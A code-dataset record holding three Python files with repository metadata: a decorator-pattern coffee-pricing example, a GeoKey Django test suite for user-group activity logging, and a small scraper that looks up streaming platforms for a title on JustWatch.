] | null | null | null | # Reference: https://www.tutorialspoint.com/python_design_patterns/python_design_patterns_decorator.htm
# Adopted for learning purposes only.
import six
from abc import ABCMeta
@six.add_metaclass(ABCMeta)
class Abstract_Coffee(object):
def get_cost(self):
pass
def get_ingredients(self):
pass
def get_tax(self):
return 0.1 * self.get_cost()
class Concrete_Coffee(Abstract_Coffee):
def get_cost(self):
return 1.00
def get_ingredients(self):
return "coffee"
@six.add_metaclass(ABCMeta)
class Abstract_Coffee_Decorator(Abstract_Coffee):
def __init__(self, decorated_coffee):
self.decorated_coffee = decorated_coffee
def get_cost(self):
return self.decorated_coffee.get_cost()
def get_ingredients(self):
return self.decorated_coffee.get_ingredients()
class Sugar(Abstract_Coffee_Decorator):
def __init__(self, decorated_coffee):
Abstract_Coffee_Decorator.__init__(self, decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost()
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", sugar"
class Milk(Abstract_Coffee_Decorator):
def __init__(self, decorated_coffee):
Abstract_Coffee_Decorator.__init__(self,decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost() + 0.25
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", milk"
class Vanilla(Abstract_Coffee_Decorator):
def __init__(self,decorated_coffee):
Abstract_Coffee_Decorator.__init__(self, decorated_coffee)
def get_cost(self):
return self.decorated_coffee.get_cost() + 0.75
def get_ingredients(self):
return self.decorated_coffee.get_ingredients() + ", vanilla"
def main():
myCoffee = Concrete_Coffee()
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Milk(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Vanilla(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
myCoffee = Sugar(myCoffee)
print("Ingredients: " + myCoffee.get_ingredients() +
"; Cost: " + str(myCoffee.get_cost()) + "; sales tax = " + str(myCoffee.get_tax()))
main()
| 31.614458 | 104 | 0.680259 | 307 | 2,624 | 5.472313 | 0.162866 | 0.151786 | 0.180952 | 0.109524 | 0.758929 | 0.727381 | 0.711905 | 0.663095 | 0.663095 | 0.663095 | 0 | 0.005266 | 0.203887 | 2,624 | 82 | 105 | 32 | 0.798947 | 0.052591 | 0 | 0.568966 | 0 | 0 | 0.069971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.310345 | false | 0.034483 | 0.034483 | 0.189655 | 0.637931 | 0.068966 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d8a6fbee4a75cbb580d2481a6a81480dc85a01a7 | 17,259 | py | Python | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | """Tests for logger: model UserGroup."""

from django.test import TestCase

from geokey.core.models import LoggerHistory
from geokey.users.tests.model_factories import UserFactory
from geokey.projects.tests.model_factories import ProjectFactory
from geokey.users.tests.model_factories import UserGroupFactory


class LogUserGroupTest(TestCase):
    """Test model UserGroup."""

    def setUp(self):
        """Set up test."""
        self.user = UserFactory.create()
        self.project = ProjectFactory.create(**{
            'creator': self.user})
        self.usergroup = UserGroupFactory.create(**{
            'project': self.project})

    def test_log_create(self):
        """Test when user group gets created."""
        log_count_init = LoggerHistory.objects.count()
        usergroup = UserGroupFactory.create(**{
            'project': self.project})

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(usergroup.id),
            'name': usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'created',
            'class': 'UserGroup'})
        self.assertEqual(log_count, log_count_init + 1)
        self.assertEqual(log.historical, None)

    def test_log_delete(self):
        """Test when user group gets deleted."""
        usergroup_id = self.usergroup.id
        usergroup_name = self.usergroup.name

        log_count_init = LoggerHistory.objects.count()
        self.usergroup.delete()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(usergroup_id),
            'name': usergroup_name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'deleted',
            'class': 'UserGroup'})
        self.assertEqual(log_count, log_count_init + 1)
        self.assertEqual(log.historical, None)

    def test_log_update_name(self):
        """Test when name changes."""
        log_count_init = LoggerHistory.objects.count()
        original_name = self.usergroup.name
        self.usergroup.name = '%s UPDATED' % self.usergroup.name
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'name'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.name, original_name)

    def test_log_update_can_contribute(self):
        """Test when setting gets set to `can contribute`."""
        self.usergroup.can_contribute = False
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_contribute',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

        self.usergroup.can_contribute = False
        self.usergroup.can_moderate = True
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_contribute',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

    def test_log_update_can_moderate(self):
        """Test when setting gets set to `can moderate`."""
        self.usergroup.can_contribute = False
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = True
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_moderate',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = True
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_moderate',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

    def test_log_update_can_view(self):
        """Test when setting gets set to `can view`."""
        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = False
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_view',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

        self.usergroup.can_contribute = True
        self.usergroup.can_moderate = True
        self.usergroup.save()

        log_count_init = LoggerHistory.objects.count()
        original_can_contribute = self.usergroup.can_contribute
        original_can_moderate = self.usergroup.can_moderate
        self.usergroup.can_contribute = False
        self.usergroup.can_moderate = False
        self.usergroup.save()

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup',
            'field': 'can_view',
            'value': 'True'})
        self.assertEqual(log_count, log_count_init + 1)
        history = self.usergroup.history.get(pk=log.historical.get('id'))
        self.assertEqual(history.id, self.usergroup.id)
        self.assertEqual(history.can_contribute, original_can_contribute)
        self.assertEqual(history.can_moderate, original_can_moderate)

    def test_log_add_user(self):
        """Test when user is added."""
        log_count_init = LoggerHistory.objects.count()
        new_user = UserFactory.create()
        self.usergroup.users.add(new_user)

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup_users',
            'subaction': 'add',
            'user_id': str(new_user.id),
            'user_display_name': new_user.display_name})
        self.assertEqual(log_count, log_count_init + 1)
        self.assertEqual(log.historical, None)

    def test_log_remove_user(self):
        """Test when user is removed."""
        existing_user = UserFactory.create()
        self.usergroup.users.add(existing_user)

        log_count_init = LoggerHistory.objects.count()
        self.usergroup.users.remove(existing_user)

        log = LoggerHistory.objects.last()
        log_count = LoggerHistory.objects.count()

        self.assertNotEqual(log.user, {
            'id': str(self.user.id),
            'display_name': self.user.display_name})
        self.assertEqual(log.project, {
            'id': str(self.project.id),
            'name': self.project.name})
        self.assertEqual(log.usergroup, {
            'id': str(self.usergroup.id),
            'name': self.usergroup.name})
        self.assertEqual(log.category, None)
        self.assertEqual(log.field, None)
        self.assertEqual(log.location, None)
        self.assertEqual(log.observation, None)
        self.assertEqual(log.comment, None)
        self.assertEqual(log.subset, None)
        self.assertEqual(log.action, {
            'id': 'updated',
            'class': 'UserGroup_users',
            'subaction': 'remove',
            'user_id': str(existing_user.id),
            'user_display_name': existing_user.display_name})
        self.assertEqual(log_count, log_count_init + 1)
        self.assertEqual(log.historical, None)
| 40.801418 | 73 | 0.624544 | 1,893 | 17,259 | 5.565769 | 0.044374 | 0.190774 | 0.194761 | 0.137813 | 0.942863 | 0.929005 | 0.902809 | 0.882973 | 0.864939 | 0.86456 | 0 | 0.000853 | 0.252912 | 17,259 | 422 | 74 | 40.898104 | 0.816271 | 0.020337 | 0 | 0.882038 | 0 | 0 | 0.049371 | 0 | 0 | 0 | 0 | 0 | 0.38874 | 1 | 0.024129 | false | 0 | 0.013405 | 0 | 0.040214 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d8d7d3562b4cd33dd6faf2cb5501165dadb8c297 | 2,477 | py | Python | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 21 11:37:29 2022

@author: debangshu
"""
import requests
from bs4 import BeautifulSoup


def format_title(title):
    title = title.lower()
    title_tokens = title.split(' ')
    title = '-'.join(title_tokens)
    return title


def find_movie(title):
    try:
        title = format_title(title)
        url = "https://www.justwatch.com/in/movie/" + title
        r = requests.get(url, allow_redirects=True)
        soup = BeautifulSoup(r.content, 'html.parser')
        platforms_list = soup.find("div", {"class": "price-comparison__grid__row price-comparison__grid__row--stream"})
        # platforms_list = soup.find("div", {"class": "price-comparison__grid__row__holder"})
        # print(platforms_list)
        children = platforms_list.findChildren()
        platforms = []
        for child in children:
            platforms.append(str(child))
        streams = []
        for platform in platforms:
            if platform.find('class="price-comparison__grid__row__icon"') and platform[0:4] == "<img":
                stream = platform[10:]
                end = stream.find("\"")
                stream = stream[:end]
                streams.append(stream)
        # No streaming services found
        if len(streams) == 0:
            return False
        return streams
    except Exception:
        return "Unable to fetch info"


def find_tvseries(title):
    try:
        title = format_title(title)
        url = "https://www.justwatch.com/in/tv-show/" + title
        r = requests.get(url, allow_redirects=True)
        soup = BeautifulSoup(r.content, 'html.parser')
        platforms_list = soup.find("div", {"class": "price-comparison__grid__row price-comparison__grid__row--stream"})
        # platforms_list = soup.find("div", {"class": "price-comparison__grid__row__holder"})
        # print(platforms_list)
        children = platforms_list.findChildren()
        platforms = []
        for child in children:
            platforms.append(str(child))
        streams = []
        for platform in platforms:
            if platform.find('class="price-comparison__grid__row__icon"') and platform[0:4] == "<img":
                stream = platform[10:]
                end = stream.find("\"")
                stream = stream[:end]
                streams.append(stream)
        # No streaming services found
        if len(streams) == 0:
            return False
        return streams
    except Exception:
        return "Unable to fetch info"
| 31.35443 | 115 | 0.600323 | 280 | 2,477 | 5.107143 | 0.307143 | 0.072727 | 0.106294 | 0.123077 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0 | 0.013385 | 0.27614 | 2,477 | 78 | 116 | 31.75641 | 0.784161 | 0.135648 | 0 | 0.792453 | 0 | 0 | 0.173954 | 0.09685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |